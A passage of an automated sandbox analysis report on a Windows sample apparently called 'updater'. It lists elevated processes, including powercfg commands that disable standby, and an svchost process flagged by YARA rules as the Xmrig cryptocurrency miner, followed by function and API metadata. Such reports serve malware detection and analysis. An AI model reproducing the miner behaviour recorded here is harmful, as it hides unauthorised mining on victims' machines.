                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:58
                                        Start time:19:46:15
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\powercfg.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                        Imagebase:0x7ff7cb0d0000
                                        File size:96'256 bytes
                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:59
                                        Start time:19:46:15
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:60
                                        Start time:19:46:15
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:61
                                        Start time:19:46:15
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:62
                                        Start time:19:46:15
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\svchost.exe
                                        Wow64 process (32bit):false
                                        Commandline:svchost.exe
                                        Imagebase:0x7ff673790000
                                        File size:57'360 bytes
                                        MD5 hash:F586835082F632DC8D9404D83BC16316
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003E.00000002.346490696563.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000003E.00000002.346490696563.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                        Has exited:false

                                        Disassembly

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:5%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:21.1%
                                          Total number of Nodes:180
                                          Total number of Limit Nodes:2
                                          execution_graph 1154 7ff6568e1394 1158 7ff6568e99e0 1154->1158 1156 7ff6568e13b8 1157 7ff6568e13c6 NtRollbackTransaction 1156->1157 1159 7ff6568e99fe 1158->1159 1162 7ff6568e9a2b 1158->1162 1159->1156 1160 7ff6568e9ad3 1161 7ff6568e9aef malloc 1160->1161 1163 7ff6568e9b10 1161->1163 1162->1159 1162->1160 1163->1159 1250 7ff6568e6a0f wcslen 1255 7ff6568e15a8 1250->1255 1256 7ff6568e1394 2 API calls 1255->1256 1209 7ff6568e1fd0 1210 7ff6568e1fe4 1209->1210 1211 7ff6568e2033 1209->1211 1210->1211 1212 7ff6568e1ffd EnterCriticalSection LeaveCriticalSection 1210->1212 1212->1211 1257 7ff6568e1e10 1258 7ff6568e1e2f 1257->1258 1259 7ff6568e1e55 1258->1259 1260 7ff6568e1ecc 1258->1260 1261 7ff6568e1eb5 1258->1261 1259->1261 1265 7ff6568e1f12 signal 1259->1265 1260->1261 1262 7ff6568e1ed3 signal 1260->1262 1262->1261 1263 7ff6568e1ee4 1262->1263 1263->1261 1264 7ff6568e1eea signal 1263->1264 1264->1261 1265->1261 1294 7ff6568e2050 1295 7ff6568e20cf 1294->1295 1296 7ff6568e205e EnterCriticalSection 1294->1296 1297 7ff6568e20c2 LeaveCriticalSection 1296->1297 1298 7ff6568e2079 1296->1298 1297->1295 1298->1297 1299 7ff6568e20bd free 1298->1299 1299->1297 1330 7ff6568e118b 1331 7ff6568e1190 1330->1331 1332 7ff6568e11b9 _amsg_exit 1330->1332 1331->1332 1333 7ff6568e11a0 Sleep 1331->1333 1335 7ff6568e11fa 1332->1335 1333->1331 1333->1332 1336 7ff6568e1201 _initterm 1335->1336 1337 7ff6568e121a 1335->1337 1336->1337 1338 7ff6568e1880 5 API calls 1337->1338 1339 7ff6568e1247 SetUnhandledExceptionFilter 1338->1339 1340 7ff6568e126a 1339->1340 1341 7ff6568e126f malloc 1340->1341 1342 7ff6568e128b 1341->1342 1343 7ff6568e12a0 strlen malloc memcpy 1342->1343 1343->1343 1344 7ff6568e12d0 1343->1344 1345 7ff6568e132d _cexit 1344->1345 1346 7ff6568e1338 1344->1346 1345->1346 1300 7ff6568e1f47 1301 7ff6568e1e67 signal 1300->1301 1304 7ff6568e1e99 1300->1304 1302 7ff6568e1e7c 1301->1302 1301->1304 1303 7ff6568e1e82 signal 1302->1303 1302->1304 1303->1304 1351 7ff6568e6586 1356 7ff6568e2df0 1351->1356 1368 7ff6568e2660 1356->1368 1358 7ff6568e2e00 memset 1362 7ff6568e2e3c 1358->1362 1370 7ff6568e2690 1362->1370 1369 7ff6568e266f 1368->1369 1369->1358 1369->1369 1405 7ff6568e155d 1370->1405 1406 7ff6568e1394 2 API calls 1405->1406 1407 7ff6568e2f88 1410 7ff6568e14a9 1407->1410 1411 7ff6568e1394 2 API calls 1410->1411 1213 7ff6568e1ac3 1217 7ff6568e1a70 1213->1217 1214 7ff6568e199e 1216 7ff6568e1a0f 1214->1216 1220 7ff6568e19e9 VirtualProtect 1214->1220 1215 7ff6568e1b36 1218 7ff6568e1ba0 4 API calls 1215->1218 1217->1214 1217->1215 1221 7ff6568e1b5c 1217->1221 1219 7ff6568e1b53 1218->1219 1220->1214 1266 7ff6568e1404 1267 7ff6568e1394 2 API calls 1266->1267 1268 7ff6568e1413 1267->1268 1269 7ff6568e1394 2 API calls 1268->1269 1270 7ff6568e2104 1271 7ff6568e2111 EnterCriticalSection 1270->1271 1275 7ff6568e2218 1270->1275 1272 7ff6568e220b LeaveCriticalSection 1271->1272 1277 7ff6568e212e 1271->1277 1272->1275 1273 7ff6568e2272 1274 7ff6568e214d TlsGetValue GetLastError 1274->1277 1275->1273 1276 7ff6568e2241 DeleteCriticalSection 1275->1276 1278 7ff6568e2230 free 1275->1278 1276->1273 1277->1272 1277->1274 1278->1276 1278->1278 1279 7ff6568e1800 1280 7ff6568e1812 1279->1280 1281 7ff6568e1835 fprintf 1280->1281 1282 7ff6568e1000 1283 7ff6568e108b __set_app_type 1282->1283 1284 7ff6568e1040 1282->1284 1286 7ff6568e10b6 1283->1286 1284->1283 1285 7ff6568e10e5 1286->1285 1288 7ff6568e1e00 1286->1288 1289 7ff6568e9f70 __setusermatherr 1288->1289 1412 7ff6568e6779 1413 7ff6568e6820 wcslen 1412->1413 1414 7ff6568e6786 1412->1414 1461 7ff6568e153f 1413->1461 1414->1413 1462 7ff6568e1394 2 API calls 1461->1462 1463 7ff6568e154e 1462->1463 1464 7ff6568e1394 2 API calls 1463->1464 1465 7ff6568e1ab3 1467 7ff6568e1a70 1465->1467 1466 7ff6568e199e 1469 7ff6568e1a0f 1466->1469 1473 7ff6568e19e9 VirtualProtect 1466->1473 1467->1465 1467->1466 1468 7ff6568e1b36 1467->1468 1472 7ff6568e1b5c 1467->1472 1470 7ff6568e1ba0 4 API calls 1468->1470 1471 7ff6568e1b53 1470->1471 1473->1466 1309 7ff6568e216f 1310 7ff6568e2185 1309->1310 1311 7ff6568e2178 InitializeCriticalSection 1309->1311 1311->1310 1222 7ff6568e38f0 wcslen 1230 7ff6568e157b 1222->1230 1232 7ff6568e1394 1230->1232 1233 7ff6568e99e0 malloc 1232->1233 1234 7ff6568e13b8 1233->1234 1235 7ff6568e13c6 NtRollbackTransaction 1234->1235 1312 7ff6568e1a70 1313 7ff6568e199e 1312->1313 1317 7ff6568e1a7d 1312->1317 1314 7ff6568e1a0f 1313->1314 1315 7ff6568e19e9 VirtualProtect 1313->1315 1315->1313 1316 7ff6568e1b5c 1317->1312 1317->1316 1318 7ff6568e1b36 1317->1318 1319 7ff6568e1ba0 4 API calls 1318->1319 1320 7ff6568e1b53 1319->1320 1321 7ff6568e146d 1322 7ff6568e1394 2 API calls 1321->1322 1325 7ff6568e1e65 1326 7ff6568e1e67 signal 1325->1326 1327 7ff6568e1e7c 1326->1327 1329 7ff6568e1e99 1326->1329 1328 7ff6568e1e82 signal 1327->1328 1327->1329 1328->1329 1236 7ff6568e15e4 1237 7ff6568e1394 2 API calls 1236->1237 1238 7ff6568e15f3 1237->1238 1474 7ff6568e219e 1475 7ff6568e2272 1474->1475 1476 7ff6568e21ab EnterCriticalSection 1474->1476 1477 7ff6568e2265 LeaveCriticalSection 1476->1477 1479 7ff6568e21c8 1476->1479 1477->1475 1478 7ff6568e21e9 TlsGetValue GetLastError 1478->1479 1479->1477 1479->1478 1292 7ff6568e2320 strlen 1293 7ff6568e2337 1292->1293 1164 7ff6568e11d8 1165 7ff6568e11fa 1164->1165 1166 7ff6568e1201 _initterm 1165->1166 1167 7ff6568e121a 1165->1167 1166->1167 1177 7ff6568e1880 1167->1177 1170 7ff6568e126a 1171 7ff6568e126f malloc 1170->1171 1172 7ff6568e128b 1171->1172 1173 7ff6568e12a0 strlen malloc memcpy 1172->1173 1173->1173 1174 7ff6568e12d0 1173->1174 1175 7ff6568e132d _cexit 1174->1175 1176 7ff6568e1338 1174->1176 1175->1176 1178 7ff6568e1247 SetUnhandledExceptionFilter 1177->1178 1179 7ff6568e18a2 1177->1179 1178->1170 1179->1178 1180 7ff6568e194d 1179->1180 1185 7ff6568e1a20 1179->1185 1181 7ff6568e199e 1180->1181 1182 7ff6568e1956 1180->1182 1181->1178 1184 7ff6568e19e9 VirtualProtect 1181->1184 1182->1181 1190 7ff6568e1ba0 1182->1190 1184->1181 1185->1181 1186 7ff6568e1b5c 1185->1186 1187 7ff6568e1b36 1185->1187 1188 7ff6568e1ba0 4 API calls 1187->1188 1189 7ff6568e1b53 1188->1189 1193 7ff6568e1bc2 1190->1193 1191 7ff6568e1c04 memcpy 1191->1182 1193->1191 1194 7ff6568e1c45 VirtualQuery 1193->1194 1195 7ff6568e1cf4 1193->1195 1194->1195 1199 7ff6568e1c72 1194->1199 1196 7ff6568e1d23 GetLastError 1195->1196 1197 7ff6568e1d37 1196->1197 1198 7ff6568e1ca4 VirtualProtect 1198->1191 1198->1196 1199->1191 1199->1198

                                          Executed Functions

                                          Function 00007FF6568E118B Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108sleepstringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.345267429688.00007FF6568E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6568E0000, based on PE: true
                                          • Associated: 00000000.00000002.345267377238.00007FF6568E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345267488717.00007FF6568EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345267530713.00007FF6568ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345267570809.00007FF6568EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268353464.00007FF656B6A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268401508.00007FF656B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268444760.00007FF656B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268444760.00007FF656B7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff6568e0000_updater.jbxd
                                          Similarity
                                          • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                          • String ID: &
                                          • API String ID: 2643109117-1499360005
                                          • Opcode ID: a143279de87784c29542b8cb12405773007f83f22a7bc91e9d7b56bbb9964d85
                                          • Instruction ID: 90ee267a871b2cc9090b059d2215e00a42989b6c35bc6194983aaf83e21cd467
                                          • Opcode Fuzzy Hash: a143279de87784c29542b8cb12405773007f83f22a7bc91e9d7b56bbb9964d85
                                          • Instruction Fuzzy Hash: 0B413AB1E09A4381FA10DB19E95437923A1BF59B80F5C5031CA9DEF7A6DE6EBC51C320
                                          Function 00007FF6568E1394 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • NtRollbackTransaction.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6568E1156), ref: 00007FF6568E13F7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.345267429688.00007FF6568E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6568E0000, based on PE: true
                                          • Associated: 00000000.00000002.345267377238.00007FF6568E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345267488717.00007FF6568EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345267530713.00007FF6568ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345267570809.00007FF6568EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268353464.00007FF656B6A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268401508.00007FF656B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268444760.00007FF656B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268444760.00007FF656B7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff6568e0000_updater.jbxd
                                          Similarity
                                          • API ID: RollbackTransaction
                                          • String ID:
                                          • API String ID: 392415941-0
                                          • Opcode ID: 1d3dcb4b41951578468dfebce8a3b5ee3b4e38d1bfb761ac12e8c11205364101
                                          • Instruction ID: c7383a12ff3736d306c51cd16791c87c71104b0b12a4a607095c387cf195d7b7
                                          • Opcode Fuzzy Hash: 1d3dcb4b41951578468dfebce8a3b5ee3b4e38d1bfb761ac12e8c11205364101
                                          • Instruction Fuzzy Hash: F6F0FF7190CB43D6DA10DB51F84102A77A0FB49380B085835E9CCAB725CF3EE955CB60

                                          Non-executed Functions

                                          Function 00007FF6568E6779 Relevance: 33.7, APIs: 17, Strings: 2, Instructions: 443COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 42 7ff6568e6779-7ff6568e6780 43 7ff6568e6820-7ff6568e68be wcslen call 7ff6568e153f call 7ff6568e145e 42->43 44 7ff6568e6786-7ff6568e6819 42->44 49 7ff6568e68c4-7ff6568e68cb 43->49 50 7ff6568e6948-7ff6568e695c 43->50 44->43 49->50 52 7ff6568e68cd-7ff6568e693e call 7ff6568e2f70 call 7ff6568e39c0 call 7ff6568e14c7 49->52 53 7ff6568e69a5-7ff6568e69ca wcslen 50->53 54 7ff6568e695e-7ff6568e699e 50->54 52->50 68 7ff6568e6940-7ff6568e6943 call 7ff6568e145e 52->68 58 7ff6568e69d0-7ff6568e69e0 _wcsnicmp 53->58 54->53 60 7ff6568e6aec 58->60 61 7ff6568e69e6-7ff6568e69fa wcslen 58->61 65 7ff6568e6af0-7ff6568e6b04 60->65 61->58 64 7ff6568e69fc 61->64 64->65 69 7ff6568e6b06-7ff6568e6b62 65->69 70 7ff6568e6b69-7ff6568e6c21 memset wcscpy wcscat call 7ff6568e2f70 call 7ff6568e3350 call 7ff6568e14c7 memset 65->70 68->50 69->70 78 7ff6568e7fbc-7ff6568e7ffe call 7ff6568e1370 70->78 79 7ff6568e6c27-7ff6568e6c2e 70->79 81 7ff6568e6c30-7ff6568e6c70 78->81 86 7ff6568e8004 78->86 79->81 82 7ff6568e6c77-7ff6568e6c87 wcslen 79->82 81->82 84 7ff6568e6cc9-7ff6568e6ccb 82->84 85 7ff6568e6c89-7ff6568e6c95 82->85 88 7ff6568e6cd1-7ff6568e6cfb wcscat memset 84->88 87 7ff6568e6ca0-7ff6568e6cb0 _wcsnicmp 85->87 86->82 91 7ff6568e6cb2-7ff6568e6cc5 wcslen 87->91 92 7ff6568e6ccd 87->92 89 7ff6568e6d01-7ff6568e6d08 88->89 90 7ff6568e8009-7ff6568e8054 call 7ff6568e1370 88->90 93 7ff6568e6d64-7ff6568e6d93 wcscpy wcscat 89->93 94 7ff6568e6d0a-7ff6568e6d5d 89->94 90->94 102 7ff6568e805a 90->102 91->87 96 7ff6568e6cc7 91->96 92->88 97 7ff6568e805f-7ff6568e8085 call 7ff6568e97d0 call 7ff6568e1370 93->97 98 7ff6568e6d99-7ff6568e6da0 93->98 94->93 96->88 101 7ff6568e6da6-7ff6568e6e50 97->101 119 7ff6568e808b 97->119 100 7ff6568e6e57-7ff6568e6e5e 98->100 98->101 104 7ff6568e6e64-7ff6568e6e6b 100->104 105 7ff6568e8090-7ff6568e80d2 call 7ff6568e1370 100->105 101->100 102->93 108 7ff6568e6eb4-7ff6568e6ebb 104->108 109 7ff6568e6e6d-7ff6568e6ead 104->109 105->109 115 7ff6568e80d8 105->115 112 7ff6568e6ec1-7ff6568e6ec8 108->112 113 7ff6568e80dd-7ff6568e8117 memcpy call 7ff6568e1370 108->113 109->108 117 7ff6568e6f7f-7ff6568e701d wcslen call 7ff6568e153f call 7ff6568e145e 112->117 118 7ff6568e6ece-7ff6568e6eea 112->118 113->118 124 7ff6568e811d 113->124 115->108 129 7ff6568e70b3 117->129 130 7ff6568e7023-7ff6568e702a 117->130 122 7ff6568e6ef0-7ff6568e6f1e 118->122 119->100 125 7ff6568e6f20-7ff6568e6f4a 122->125 126 7ff6568e6f4c-7ff6568e6f78 122->126 124->117 125->122 126->117 132 7ff6568e70bf-7ff6568e70db 129->132 133 7ff6568e70ba call 7ff6568e145e 129->133 130->129 131 7ff6568e7030-7ff6568e70a9 call 7ff6568e2f70 call 7ff6568e39c0 call 7ff6568e14c7 130->131 131->129 140 7ff6568e70ab-7ff6568e70ae call 7ff6568e145e 131->140 133->132 140->129
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.345267429688.00007FF6568E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6568E0000, based on PE: true
                                          • Associated: 00000000.00000002.345267377238.00007FF6568E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345267488717.00007FF6568EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345267530713.00007FF6568ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345267570809.00007FF6568EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268353464.00007FF656B6A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268401508.00007FF656B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268444760.00007FF656B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268444760.00007FF656B7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff6568e0000_updater.jbxd
                                          Similarity
                                          • API ID: wcslen$_wcsnicmp
                                          • String ID: 0$X&
                                          • API String ID: 4256727079-1646855245
                                          • Opcode ID: 2ad9b95b428851b68ec7e9912ffa00502d73405e26e9a561cf93f4fe1461c13d
                                          • Instruction ID: 532f859f98f55e8ff2fa40a83c2e5f99d8f60e970029d6ef91d6efd8f0eb21ea
                                          • Opcode Fuzzy Hash: 2ad9b95b428851b68ec7e9912ffa00502d73405e26e9a561cf93f4fe1461c13d
                                          • Instruction Fuzzy Hash: D6425261D2C6C784F7218B29D8413F46370BF96388F4C5235D99CFA6A1EFAE66A5C310
                                          Function 00007FF6568E11D8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 78stringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.345267429688.00007FF6568E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6568E0000, based on PE: true
                                          • Associated: 00000000.00000002.345267377238.00007FF6568E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345267488717.00007FF6568EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345267530713.00007FF6568ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345267570809.00007FF6568EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268353464.00007FF656B6A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268401508.00007FF656B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268444760.00007FF656B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268444760.00007FF656B7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff6568e0000_updater.jbxd
                                          Similarity
                                          • API ID: malloc$ExceptionFilterUnhandled_cexit_inittermmemcpystrlen
                                          • String ID: &
                                          • API String ID: 3825114775-1499360005
                                          • Opcode ID: fb30249d2068266854ec9e895c86aedb2bf09c1cf0466ecf682e59239ecf8f1d
                                          • Instruction ID: 2589a8cd05da8d07ae2b6704229ba4a03d7328fb53ad9385f39614627ecf8bc3
                                          • Opcode Fuzzy Hash: fb30249d2068266854ec9e895c86aedb2bf09c1cf0466ecf682e59239ecf8f1d
                                          • Instruction Fuzzy Hash: F9412AB1A1DA4380FA11DB19E9543B923A1BF55780F5C4031CA8DEF7A2CE6EF855C320
                                          Function 00007FF6568E3350 Relevance: 21.2, APIs: 9, Strings: 5, Instructions: 206COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.345267429688.00007FF6568E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6568E0000, based on PE: true
                                          • Associated: 00000000.00000002.345267377238.00007FF6568E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345267488717.00007FF6568EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345267530713.00007FF6568ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345267570809.00007FF6568EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268353464.00007FF656B6A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268401508.00007FF656B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268444760.00007FF656B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268444760.00007FF656B7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff6568e0000_updater.jbxd
                                          Similarity
                                          • API ID: memset$wcscatwcscpywcslen
                                          • String ID: $0$0$@$@
                                          • API String ID: 4263182637-1413854666
                                          • Opcode ID: f0c1ed3e0b43149840575df363cb09832e7bcaaaea9c741d1618f9adab6ccee0
                                          • Instruction ID: 70abc7af16247dadfbb75c072cf1fd6a69f6e3a49c542844c5fbf9c6e5cc38ce
                                          • Opcode Fuzzy Hash: f0c1ed3e0b43149840575df363cb09832e7bcaaaea9c741d1618f9adab6ccee0
                                          • Instruction Fuzzy Hash: 0BB1A36190C6C385F7218B15F8453BA77A0FF81348F184235EA8CAA6A5DF7EE946CB50
                                          Function 00007FF6568E2690 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 322COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.345267429688.00007FF6568E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6568E0000, based on PE: true
                                          • Associated: 00000000.00000002.345267377238.00007FF6568E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345267488717.00007FF6568EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345267530713.00007FF6568ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345267570809.00007FF6568EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268353464.00007FF656B6A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268401508.00007FF656B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268444760.00007FF656B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268444760.00007FF656B7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff6568e0000_updater.jbxd
                                          Similarity
                                          • API ID: wcslen$memsetwcscatwcscpywcsncmp
                                          • String ID: 0$X$`
                                          • API String ID: 329590056-2527496196
                                          • Opcode ID: bf7d6d7f09f5688ba25f00927fe5a74f17b49469571986f60aaf0f4e4d97f406
                                          • Instruction ID: 18058d3439ad1f539b319c04b7c3d94572858084ea49902c1a70d1fadd04b806
                                          • Opcode Fuzzy Hash: bf7d6d7f09f5688ba25f00927fe5a74f17b49469571986f60aaf0f4e4d97f406
                                          • Instruction Fuzzy Hash: 6402D472918BC281E720DB15E8403AA77A0FB85798F184235DAECAB7E5DF7ED544C710
                                          Function 00007FF6568E1BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • VirtualQuery.KERNEL32(?,?,?,?,00007FF6568EB914,00007FF6568EB914,?,?,00007FF6568E0000,?,00007FF6568E1991), ref: 00007FF6568E1C63
                                          • VirtualProtect.KERNEL32(?,?,?,?,00007FF6568EB914,00007FF6568EB914,?,?,00007FF6568E0000,?,00007FF6568E1991), ref: 00007FF6568E1CC7
                                          • memcpy.MSVCRT ref: 00007FF6568E1CE0
                                          • GetLastError.KERNEL32(?,?,?,?,00007FF6568EB914,00007FF6568EB914,?,?,00007FF6568E0000,?,00007FF6568E1991), ref: 00007FF6568E1D23
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.345267429688.00007FF6568E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6568E0000, based on PE: true
                                          • Associated: 00000000.00000002.345267377238.00007FF6568E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345267488717.00007FF6568EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345267530713.00007FF6568ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345267570809.00007FF6568EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268353464.00007FF656B6A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268401508.00007FF656B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268444760.00007FF656B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268444760.00007FF656B7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff6568e0000_updater.jbxd
                                          Similarity
                                          • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                          • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                          • API String ID: 2595394609-2123141913
                                          • Opcode ID: 2987fb7c94cd36b2a58051b304da944e2302a15d1c826c7cf92839f9f5faa279
                                          • Instruction ID: f6eb3d47a77dea73d88d3e2b59ed392b37de8c8908afac8a34823eb43475dc9f
                                          • Opcode Fuzzy Hash: 2987fb7c94cd36b2a58051b304da944e2302a15d1c826c7cf92839f9f5faa279
                                          • Instruction Fuzzy Hash: 07417F61B08A4781EE618B55D8446B827A0FF85B84F5C4132CE4DEF7A5DE3EF946C320
                                          Function 00007FF6568E2104 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
